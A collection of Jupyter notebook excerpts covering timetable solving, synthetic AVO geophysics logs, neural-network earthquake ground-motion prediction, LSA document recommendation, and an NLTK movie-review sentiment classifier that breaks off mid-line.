student_group_cell.send_state() def create_table(table_name, solution, columns, name_map): global cell_map out = sheet(rows=len(solution.timeslot_list) + 1, columns=len(columns) + 1) header_color = "#22222222" cell(0,0, read_only=True, background_color=header_color) header_row = row(0, list(map(name_map, columns)), column_start=1, read_only=True, background_color=header_color) timeslot_column = column(0, list(map(lambda timeslot: timeslot.day_of_week[0:3] + " " + str(timeslot.start_time)[0:10], solution.timeslot_list)), row_start=1, read_only=True, background_color=header_color) table_cells = dict() cell_map[table_name] = table_cells for x in range(len(solution.timeslot_list)): for y in range(len(columns)): table_cells[(x, y)] = cell(x + 1, y + 1, "", read_only=True) return out solver_manager = solver_manager_create(solver_config) by_room_table = create_table('room', solution, solution.room_list, lambda room: room.name) by_teacher_table = create_table('teacher', solution, solution.teacher_list, lambda teacher: teacher) by_student_group_table =
create_table('student_group', solution, solution.student_group_list, lambda student_group: student_group) solver_manager.solveAndListen(0, lambda the_id: solution, on_best_solution_changed) tab = Tab() tab.children = [by_room_table, by_teacher_table, by_student_group_table] tab.set_title(0, 'By Room') tab.set_title(1, 'By Teacher') tab.set_title(2, 'By Student Group') tab ###Output _____no_output_____
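###Markdown Because `on_best_solution_changed` keeps rebinding `solution` to the latest best solution, a simple way to inspect the final result once the 30-second run has finished is a cell like this (run it after solving ends): ###Code
# `solution` was rebound by on_best_solution_changed as better solutions arrived.
print(solution.get_score())
print(solution)
###Output _____no_output_____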
1_synthetic/4_avo_synthetic.ipynb
###Markdown Compute the elastic impedance, the normalized elastic impedance and the lrm ###Code import numpy as np import matplotlib.pyplot as plt import matplotlib.colors as colors import impedance as ip %matplotlib inline ###Output _____no_output_____ ###Markdown Elastic properties for AVO classesThe cell below defines the elastic properties for AVO classes compiled by [Alessandro del Monte](http://nbviewer.ipython.org/github/aadm/geophysical_notes/blob/master/avo_explorer_v2_mono.ipynb). Originally, Class IV is from Castagna & Swan (1997) "Principles of AVO crossplotting" and the others from Hilterman (2001) "Seismic Amplitude Interpretation". ###Code shale = np.array([[3094,1515,2.40], [2643,1167,2.29], [2192,818,2.16], [3240,1620,2.34]]) sandgas = np.array([[4050,2526,2.21], [2781,1665,2.08], [1542,901,1.88], [1650,1090,2.07]]) sandbrine = np.array([[4115,2453,2.32], [3048,1595,2.23], [2134,860,2.11], [2590,1060,2.21]]) avocl=['Class I','Class II','Class III','Class IV'] angle = 30 ###Output _____no_output_____ ###Markdown These properties are used to generate the synthetic logs ###Code faceis_vet = np.zeros(5) vp=np.zeros(5) + shale[0,0] vs = np.zeros(5) + shale[0,1] rho = np.zeros(5) + shale[0,2] for i in range (len(avocl)): vp1 = np.zeros(100) + shale[i,0] #m/s vs1 = np.zeros(100) + shale[i,1] rho1 = np.zeros(100) + shale[i,2] #g/cc faceis_vet1 = np.zeros(100) vp2 = np.zeros(100) + sandgas[i,0] vs2 = np.zeros(100) + sandgas[i,1] #m/s rho2 = np.zeros(100) + sandgas[i,2] #g/cc faceis_vet2 = np.zeros(100) + 1 vp3 = np.zeros(100) + sandbrine[i,0] vs3 = np.zeros(100) + sandbrine[i,1] #m/s rho3 = np.zeros(100) + sandbrine[i,2] #g/cc faceis_vet3 = np.zeros(100) + 2 vp=np.concatenate((vp,vp1,vp2,vp1,vp3)) vs=np.concatenate((vs,vs1,vs2,vs1,vs3)) rho=np.concatenate((rho,rho1,rho2,rho1,rho3)) faceis_vet=np.concatenate((faceis_vet,faceis_vet1,faceis_vet2,faceis_vet1,faceis_vet3)) vp += np.random.normal(0, np.max(np.abs(vp))*0.005, len(vp)) vs += np.random.normal(0, np.max(np.abs(vs))*0.005, len(vs)) rho += np.random.normal(0, np.max(np.abs(rho))*0.1, len(rho)) vpvs=vp/vs #poisson ratio pr=0.5*((vpvs**2-2)/(vpvs**2-1)) ai=ip.ai(vp,rho) # acoustic impedance ei=ip.ei(vp,vs,rho,angle) # elastic impedance nei=ip.nei(vp,vs,rho,shale[2,0],shale[2,1],shale[2,2],angle) # normalized elastic impedance lambda_rho,mu_rho=ip.lrm(vp,vs,rho) # lambda rho and mu rho ###Output _____no_output_____ ###Markdown Plot the logs - the tops of the gas sands are in red ###Code fig=plt.figure(figsize=(12,15)) ax=plt.subplot(2,5,1) plt.title('vp',fontsize=13) plt.plot(vp,np.arange(vp.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.hlines(505,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.hlines(905,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.hlines(1305,np.min(vp),np.max(vp),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,2) plt.title('vs',fontsize=13) plt.plot(vs,np.arange(vs.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.hlines(505,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.hlines(905,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.hlines(1305,np.min(vs),np.max(vs),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,3) plt.title('rho',fontsize=13) plt.plot(rho,np.arange(rho.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.hlines(505,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.hlines(905,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.hlines(1305,np.min(rho),np.max(rho),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,4) plt.title('vp/vs',fontsize=13) plt.plot(vpvs,np.arange(vpvs.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.hlines(505,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.hlines(905,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.hlines(1305,np.min(vpvs),np.max(vpvs),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,5) plt.title('poisson ratio',fontsize=13) plt.plot(pr,np.arange(pr.shape[0])) ax.invert_yaxis() plt.hlines(105,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.hlines(505,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.hlines(905,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.hlines(1305,np.min(pr),np.max(pr),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,6) plt.title(r'$\lambda\rho - \mu\rho$',fontsize=13) plt.plot(lambda_rho,np.arange(lambda_rho.shape[0]),label=r'$\lambda\rho$',color='darkblue') plt.plot(mu_rho,np.arange(mu_rho.shape[0]),label=r'$\mu\rho$',color='darkgreen') ax.invert_yaxis() plt.legend(loc='lower left') plt.hlines(105,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.hlines(505,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.hlines(905,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.hlines(1305,np.min(mu_rho),np.max(mu_rho),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,7) plt.title('AI',fontsize=13) plt.plot(ai,np.arange(ai.shape[0]),color='darkblue') ax.invert_yaxis() plt.hlines(105,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.hlines(505,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.hlines(905,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.hlines(1305,np.min(ai),np.max(ai),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,8) plt.title('EI',fontsize=13) plt.plot(ei,np.arange(ei.shape[0]),color='darkgreen') ax.invert_yaxis() plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,9) plt.title('NEI',fontsize=13) plt.plot(nei,np.arange(nei.shape[0]),color='darkorange') ax.invert_yaxis() plt.hlines(105,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.hlines(505,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.hlines(905,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.hlines(1305,np.min(nei),np.max(nei),colors='r',alpha=0.6) plt.grid(True) ax=plt.subplot(2,5,10) plt.title('AI - EI - NEI',fontsize=13) plt.plot(ai,np.arange(ai.shape[0]),label='ai',color='darkblue') plt.plot(ei,np.arange(ei.shape[0]),label='ei',color='darkgreen') plt.plot(nei,np.arange(nei.shape[0]),label='nei',color='darkorange') plt.legend(loc='center left', bbox_to_anchor=(1, 0.5)) ax.invert_yaxis() plt.hlines(105,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(505,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(905,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.hlines(1305,np.min(ei),np.max(ei),colors='r',alpha=0.6) plt.grid(True) plt.tight_layout() ###Output _____no_output_____ ###Markdown Crossplots ###Code #colormap from del Monte (2015) # 0=shale 1=gas 2=brine (matching the facies vector built above) ccc = ['blue','red','green'] cmap_facies = colors.ListedColormap(ccc[0:len(ccc)], 'indexed') fig=plt.figure(figsize=(16,6)) ax=plt.subplot(2,4,1) plt.scatter(vp,rho,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('Vp (m/s)') ax.set_ylabel('Rhob (g/cc)') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['shale', 'gas', 'brine'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,2) plt.scatter(vp,vs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('Vp (m/s)') ax.set_ylabel('Vs (m/s)') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['shale', 'gas', 'brine'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,3) plt.scatter(vs,vpvs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('Vs (m/s)') ax.set_ylabel('Vp/Vs') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['shale', 'gas', 'brine'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,4) plt.scatter(lambda_rho,mu_rho,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel(r'$\lambda\rho (g^2/cc^2 x m^2/s^2)$') ax.set_ylabel(r'$\mu\rho (g^2/cc^2 x m^2/s^2)$') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['shale', 'gas', 'brine'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,5) plt.scatter(ai,vpvs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('AI (g/cc x m/s)') ax.set_ylabel('Vp/Vs') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['shale', 'gas', 'brine'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,6) plt.scatter(nei,vpvs,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('NEI (g/cc x m/s)') ax.set_ylabel('Vp/Vs') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['shale', 'gas', 'brine'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') ax=plt.subplot(2,4,7) plt.scatter(nei,ai,20,c=faceis_vet,cmap=cmap_facies) ax.set_xlabel('NEI (g/cc x m/s)') ax.set_ylabel('AI (g/cc x m/s)') plt.grid() cbar=plt.colorbar(pad=0) cbar.set_label((15*' ').join(['shale', 'gas', 'brine'])) cbar.set_ticks(range(0,1)); cbar.set_ticklabels('') plt.tight_layout() ###Output _____no_output_____
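###Markdown The local `impedance` module is not shown here; if `ip.ei` follows Connolly's (1999) definition of elastic impedance, the quantity it computes would look like this sketch, where `k` is an average value of (vs/vp)² (the default 0.25 below is an assumption): ###Code
import numpy as np

def elastic_impedance(vp, vs, rho, angle_deg, k=0.25):
    """Connolly (1999) elastic impedance; k ~ average (vs/vp)**2 (assumed here)."""
    t = np.radians(angle_deg)
    return (vp ** (1 + np.tan(t) ** 2)
            * rho ** (1 - 4 * k * np.sin(t) ** 2)
            * vs ** (-8 * k * np.sin(t) ** 2))
###Output _____no_output_____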
0neural network.ipynb
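###Markdown The cells below assume `pandas`, `numpy`, `matplotlib`, and `sklearn.metrics` are already imported, and that `mlp` is an already-trained regressor mapping event features to peak ground velocity (PGV); none of that appears in this excerpt, so the setup sketched here is an assumption: ###Code
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import metrics
from sklearn.neural_network import MLPRegressor

# `mlp` must be a regressor fitted elsewhere on (event features) -> PGV data.
# Its training data and hyperparameters are not part of this excerpt, so the
# line below is only a placeholder showing the expected interface:
# mlp = MLPRegressor(hidden_layer_sizes=(100,), max_iter=1000).fit(X_train, y_train)
###Output _____no_output_____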
###Markdown kumamoto0414 ###Code kumamoto0414=pd.read_csv('kumamoto.csv') kumamoto0414.head() Ypgvkumamoto0414=mlp.predict(kumamoto0414) Lkumamoto0414=kumamoto0414.iloc[:,1].values Kpgvkumamoto0414=pd.read_csv('pgvkumamoto.csv') plt.title('kumamoto0414') plt.scatter(Lkumamoto0414,Kpgvkumamoto0414, color='green', label='observed',alpha=1) plt.scatter(Lkumamoto0414,Ypgvkumamoto0414, color='darkorange', label='predicted',alpha=1) plt.xlim(10,500) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0414,Ypgvkumamoto0414)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0414,Ypgvkumamoto0414)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0414, Ypgvkumamoto0414))) from sklearn.metrics import r2_score print('r^2 test data: ', r2_score(Kpgvkumamoto0414,Ypgvkumamoto0414)) ###Output r^2 test data: 0.17459876441454936 ###Markdown kumamoto0416 ###Code kumamoto0416=pd.read_csv('kumamoto416.csv') kumamoto0416.head() Ypgvkumamoto0416=mlp.predict(kumamoto0416) Lkumamoto0416=kumamoto0416.iloc[:,1].values Kpgvkumamoto0416=pd.read_csv('pgvkumamoto416.csv') plt.title('kumamoto0416') plt.scatter(Lkumamoto0416,Kpgvkumamoto0416, color='green', label='observed',alpha=1) plt.scatter(Lkumamoto0416,Ypgvkumamoto0416, color='darkorange', label='predicted',alpha=1) plt.xlim(10,1500) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0416,Ypgvkumamoto0416)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0416,Ypgvkumamoto0416)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0416, Ypgvkumamoto0416))) ###Output Mean Absolute Error 2.996679669834763 Mean Squared Error: 49.066334748408224 Root Mean Squared Error: 7.004736593791963 ###Markdown osaka0618 ###Code osaka0618=pd.read_csv('osaka0618.csv') osaka0618.head() Ypgvosaka0618=mlp.predict(osaka0618) Losaka0618=osaka0618.iloc[:,1].values Kpgvosaka0618=pd.read_csv('pgvosaka0618.csv') plt.title('osaka0618') plt.scatter(Losaka0618,Kpgvosaka0618, color='green', label='observed',alpha=1) plt.scatter(Losaka0618,Ypgvosaka0618, color='darkorange', label='predicted',alpha=1) plt.xlim(10,500) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka0618,Ypgvosaka0618)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka0618,Ypgvosaka0618)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka0618, Ypgvosaka0618))) ###Output Mean Absolute Error 1.6959718992784847 Mean Squared Error: 15.254963398931798 Root Mean Squared Error: 3.9057602843661305 ###Markdown hokkaido0906 ###Code hokkaido0906=pd.read_csv('hokkaido0906.csv') hokkaido0906.head() Ypgvhokkaido0906=mlp.predict(hokkaido0906) Lhokkaido0906=hokkaido0906.iloc[:,1].values Kpgvhokkaido0906=pd.read_csv('pgvhokkaido0906.csv') plt.title('hokkaido0906') plt.scatter(Lhokkaido0906,Kpgvhokkaido0906, color='green', label='observed',alpha=1) plt.scatter(Lhokkaido0906,Ypgvhokkaido0906, color='darkorange', label='predicted',alpha=1) plt.xlim(10,1000) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido0906,Ypgvhokkaido0906)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido0906,Ypgvhokkaido0906)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido0906, Ypgvhokkaido0906))) ###Output Mean Absolute Error 3.3931648425860472 Mean Squared Error: 87.72881878979227 Root Mean Squared Error: 9.366366360002809 ###Markdown Tests at distances within 100 km hokkaido ###Code hokkaido100=pd.read_csv('h100.csv') Ypgvhokkaido100=mlp.predict(hokkaido100) Lhokkaido100=hokkaido100.iloc[:,1].values Kpgvhokkaido100=pd.read_csv('ph100.csv') plt.title('hokkaido100') plt.scatter(Lhokkaido100,Kpgvhokkaido100,s=13, color='green', label='observed',alpha=1) plt.scatter(Lhokkaido100,Ypgvhokkaido100,s=13, color='orange', label='predicted',alpha=1) plt.xlim(10,100) plt.ylim(1,300) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido100,Ypgvhokkaido100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100))) ###Output Mean Absolute Error 12.430680350728197 Mean Squared Error: 555.5608575338796 Root Mean Squared Error: 23.570338511228037 ###Markdown osaka ###Code osaka100=pd.read_csv('o100.csv') Ypgvosaka100=mlp.predict(osaka100) Losaka100=osaka100.iloc[:,1].values Kpgvosaka100=pd.read_csv('po100.csv') plt.title('osaka100') plt.scatter(Losaka100,Kpgvosaka100,s=13, color='green', label='observed',alpha=1) plt.scatter(Losaka100,Ypgvosaka100,s=13, color='orange', label='predicted',alpha=1) plt.xlim(10,100) plt.ylim(1,100) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka100,Ypgvosaka100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100))) ###Output Mean Absolute Error 4.044321723784055 Mean Squared Error: 63.70960301104061 Root Mean Squared Error: 7.981829552868228 ###Markdown kumamoto0416 ###Code kh100=pd.read_csv('kh100.csv') Ypgvkh100=mlp.predict(kh100) Lkh100=kh100.iloc[:,1].values Kpgvkh100=pd.read_csv('pkh100.csv') plt.title('kumamoto(0416)100') plt.scatter(Lkh100,Kpgvkh100,s=13, color='green', label='observed',alpha=1) plt.scatter(Lkh100,Ypgvkh100,s=13, color='orange', label='predicted',alpha=1) plt.xlim(10,100) plt.ylim(1,200) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkh100,Ypgvkh100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkh100,Ypgvkh100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkh100,Ypgvkh100))) ###Output Mean Absolute Error 9.254420001665043 Mean Squared Error: 249.43201457090316 Root Mean Squared Error: 15.793416811155943 ###Markdown kumamoto0414 ###Code kz100=pd.read_csv('kz100.csv') Ypgvkz100=mlp.predict(kz100) Lkz100=kz100.iloc[:,1].values Kpgvkz100=pd.read_csv('pkz100.csv') plt.title('kumamoto(0414)100') plt.scatter(Lkz100,Kpgvkz100,s=13, color='green', label='observed',alpha=1) plt.scatter(Lkz100,Ypgvkz100,s=13, color='orange', label='predicted',alpha=1) plt.xlim(10,100) plt.ylim(1,200) plt.xlabel('distance(km)') plt.ylabel('pgv(cm/s)') plt.yscale('log') plt.xscale('log') plt.legend() plt.grid(True) plt.show() print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkz100,Ypgvkz100)) print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkz100,Ypgvkz100)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkz100,Ypgvkz100))) ###Output Mean Absolute Error 6.330815098707226 Mean Squared Error: 130.0407185445954 Root Mean Squared Error: 11.40353973749359
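###Markdown The evaluation boilerplate above repeats for every event; a small helper collapses it (this reuses `metrics`, `np`, and the arrays defined in the cells above): ###Code
def report_errors(observed, predicted):
    """Print MAE, MSE and RMSE for one event, matching the cells above."""
    mae = metrics.mean_absolute_error(observed, predicted)
    mse = metrics.mean_squared_error(observed, predicted)
    print('Mean Absolute Error', mae)
    print('Mean Squared Error:', mse)
    print('Root Mean Squared Error:', np.sqrt(mse))

report_errors(Kpgvkz100, Ypgvkz100)  # e.g. the kumamoto0414 subset above
###Output _____no_output_____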
notebooks/Latent_semantic_analysis.ipynb
###Markdown UNSUPERVISED LEARNING Recommending documents with LSA---- ❗ NLTK is hard to install. I recommend running this notebook in Google Colab instead: https://drive.google.com/file/d/1xel4VmTqzFoZkOiEijyGhYuH6BQW5lYM/view?usp=sharing----We'd like to find documents with similar content to a document we like, but without having to rely on tagging or other labels. This is what **latent semantic analysis** is for. We can 'sense' the meaning of a document from the words it contains.Inspired by and/or based on [**science concierge**](https://github.com/titipata/science_concierge) and [**Chris Clark's repo**](https://github.com/groveco/content-engine) on content-based recommendation.[This blog post](https://www.themarketingtechnologist.co/a-recommendation-system-for-blogs-content-based-similarity-part-2/) is also really good. [Pysuggest](https://pypi.python.org/pypi/pysuggest) might be worth looking at, and so might [Crab](https://muricoca.github.io/crab/).Believe it or not, we can do all of it in about 10 lines of code!----We'll start with some data: ###Code import pandas as pd df = pd.read_csv('https://raw.githubusercontent.com/seg/2017-tle-hall/master/data/title_abstract_doi.csv') df.head() ###Output _____no_output_____ ###Markdown Prepare the data ###Code from nltk.stem.porter import PorterStemmer from nltk.tokenize import RegexpTokenizer # Instantiate the stemmer and tokenizer. stemmer, tokenizer = PorterStemmer(), RegexpTokenizer(r'\w+') # Make a function to preprocess each item in the data. def preprocess(item): return ' '.join(stemmer.stem(token) for token in tokenizer.tokenize(item)) # Apply the preprocessing. data = [preprocess(item) for item in df.abstract] ###Output _____no_output_____ ###Markdown Compute the document matrixThe matrix is a **term frequency, inverse document frequency** or "tfidf" matrix. This counts how many times words and/or phrases ('terms') appear in a document, then scales those frequencies to the inverse of how frequent they are in the cohort. So a rare word like 'coulomb' carries more weight than a common one like 'seismic'.The `sklearn` implementation automatically filters 'stop' words, eliminating things like 'the' or 'this'. It works just like `sklearn`'s other models: ###Code from sklearn.feature_extraction.text import TfidfVectorizer tfidf = TfidfVectorizer(stop_words='english', ngram_range=(1,1)) vecs = tfidf.fit_transform(data) ###Output _____no_output_____ ###Markdown The resulting matrix has one row for each document, and one column for each 'term'. If we include n-grams, which are groups of words, the matrix will be very large. ###Code vecs.shape ###Output _____no_output_____ ###Markdown Reduce the number of dimensionsTo make the matrix more manageable, we can reduce the number of dimensions with singular value decomposition. We'll reduce it down to 100 dimensions. ###Code from sklearn.decomposition import TruncatedSVD svd = TruncatedSVD(n_components=100).fit_transform(vecs) ###Output _____no_output_____ ###Markdown Build and store the distance treeThe distance tree is a fast data structure for finding nearest neighbours in a high-dimensional space. ###Code from sklearn.neighbors import KDTree tree = KDTree(svd) ###Output _____no_output_____ ###Markdown Query the tree for recommendationsNow we can find a paper we're interested in and try to find similar papers. ###Code target = 333 df.title[target] # Recommend 5 docs for a single document.
_, idx = tree.query([svd[target]], k=6) [df.title[i] for i in idx[0] if i != target] ###Output _____no_output_____
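###Markdown The query pattern above is easy to wrap in a small helper. This cell is an added sketch rather than part of the original notebook: the `recommend` name and its `n` parameter are illustrative choices, and the function only uses objects already defined above (`tree`, `svd`, `df`). ###Code
# Added sketch (hypothetical helper): recommend the n most similar documents.
def recommend(target, n=5):
    # Ask for n+1 neighbours, because the target is its own nearest neighbour.
    _, idx = tree.query([svd[target]], k=n+1)
    # Drop the target itself and return the matching titles.
    return [df.title[i] for i in idx[0] if i != target]

recommend(333)
###Output _____no_output_____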
wei/p18.ipynb
###Markdown p.18 Better Training Data ###Code from IPython.display import YouTubeVideo YouTubeVideo('UF-RyxOAHQw') ###Output _____no_output_____ ###Markdown 1. A new datasetMuch shorter movie reviews at https://pythonprogramming.net/static/downloads/short_reviews/. 2. Example ###Code import nltk import random import string from nltk.corpus import stopwords from nltk.tokenize import word_tokenize from nltk.classify.scikitlearn import SklearnClassifier import pickle from sklearn.naive_bayes import MultinomialNB, GaussianNB, BernoulliNB from sklearn.linear_model import LogisticRegression, SGDClassifier from sklearn.svm import SVC, LinearSVC, NuSVC from nltk.classify import ClassifierI from statistics import mode class VoteClassifier(ClassifierI): def __init__(self, *classifiers): self._classifiers = classifiers def classify(self, features): votes = [] for c in self._classifiers: v = c.classify(features) votes.append(v) return mode(votes) def confidence(self, features): votes = [] for c in self._classifiers: v = c.classify(features) votes.append(v) choice_votes = votes.count(mode(votes)) conf = choice_votes/len(votes) return conf # If you see the "UnicodeDecodeError", add the options "encoding='utf-8', errors='replace'". short_pos = open("short_reviews/positive.txt", "r", encoding='utf-8', errors='replace').read() short_neg = open("short_reviews/negative.txt", "r", encoding='utf-8', errors='replace').read() documents = [] # Note that each entry of documents is a short review, not a single word from the short review. for r in short_pos.split('\n'): documents.append((r, "pos")) for r in short_neg.split('\n'): documents.append((r, "neg")) all_words = [] short_pos_words = word_tokenize(short_pos) short_neg_words = word_tokenize(short_neg) # Remove the stop words and the punctuations. stop_words = set(stopwords.words("english")) stop_words = stop_words.union(set(string.punctuation)) #print("stop_words:\n", stop_words) for w in short_pos_words: if w.lower() not in stop_words: all_words.append(w.lower()) for w in short_neg_words: if w.lower() not in stop_words: all_words.append(w.lower()) all_words = nltk.FreqDist(all_words) # Restrict our 'features' to the most common 5000 words. word_features = all_words.most_common(5000) word_features = [wf[0] for wf in word_features] # Check if each of the most common 5000 words is present in one movie review. # The input document is a short review. def find_features(document): words = word_tokenize(document) features = {} for w in word_features: features[w] = (w in words) return features # print((find_features(movie_reviews.words('neg/cv000_29416.txt')))) # Label the 'features' in all the movie reviews. featuresets = [(find_features(rev), category) for (rev, category) in documents] random.shuffle(featuresets) # Partition the entire data set into training set and test set. training_set = featuresets[:10000] testing_set = featuresets[10000:] ## ## Trained naive Bayes classifier ## # Don't load this naive Bayes classfier which was trained for the long movie reviews. 
#classifier_f = open("naivebayes.pickle", "rb") #classifier = pickle.load(classifier_f) #classifier_f.close() #print("Naive Bayes Algo accuracy percent:", (nltk.classify.accuracy(classifier, testing_set))*100) #classifier.show_most_informative_features(15) ## ## Scikit-Learn MultinomialNB ## MultinomialNB_classifier = SklearnClassifier(MultinomialNB()) MultinomialNB_classifier.train(training_set) print("MNB_classifier accuracy percent:", (nltk.classify.accuracy(MultinomialNB_classifier, testing_set))*100) ## ## Scikit-Learn GaussianNB ## # GaussianNB_classifier = SklearnClassifier(GaussianNB()) # GaussianNB_classifier.train(training_set) # print("GaussianNB_classifier accuracy percent:", (nltk.classify.accuracy(GaussianNB_classifier, testing_set))*100) ## ## Scikit-Learn BernoulliNB ## BernoulliNB_classifier = SklearnClassifier(BernoulliNB()) BernoulliNB_classifier.train(training_set) print("BernoulliNB_classifier accuracy percent:", (nltk.classify.accuracy(BernoulliNB_classifier, testing_set))*100) ## ## Scikit-Learn LogisticRegression ## LogisticRegression_classifier = SklearnClassifier(LogisticRegression()) LogisticRegression_classifier.train(training_set) print("LogisticRegression_classifier accuracy percent:", (nltk.classify.accuracy(LogisticRegression_classifier, testing_set))*100) ## ## Scikit-Learn SGDClassifier ## SGDClassifier_classifier = SklearnClassifier(SGDClassifier()) SGDClassifier_classifier.train(training_set) print("SGDClassifier_classifier accuracy percent:", (nltk.classify.accuracy(SGDClassifier_classifier, testing_set))*100) ## ## Scikit-Learn SVC ## # The performance of the classic SVC is poor, so it is NOT used. #SVC_classifier = SklearnClassifier(SVC()) #SVC_classifier.train(training_set) #print("SVC_classifier accuracy percent:", (nltk.classify.accuracy(SVC_classifier, testing_set))*100) ## ## Scikit-Learn LinearSVC ## LinearSVC_classifier = SklearnClassifier(LinearSVC()) LinearSVC_classifier.train(training_set) print("LinearSVC_classifier accuracy percent:", (nltk.classify.accuracy(LinearSVC_classifier, testing_set))*100) ## ## Scikit-Learn NuSVC ## NuSVC_classifier = SklearnClassifier(NuSVC()) NuSVC_classifier.train(training_set) print("NuSVC_classifier accuracy percent:", (nltk.classify.accuracy(NuSVC_classifier, 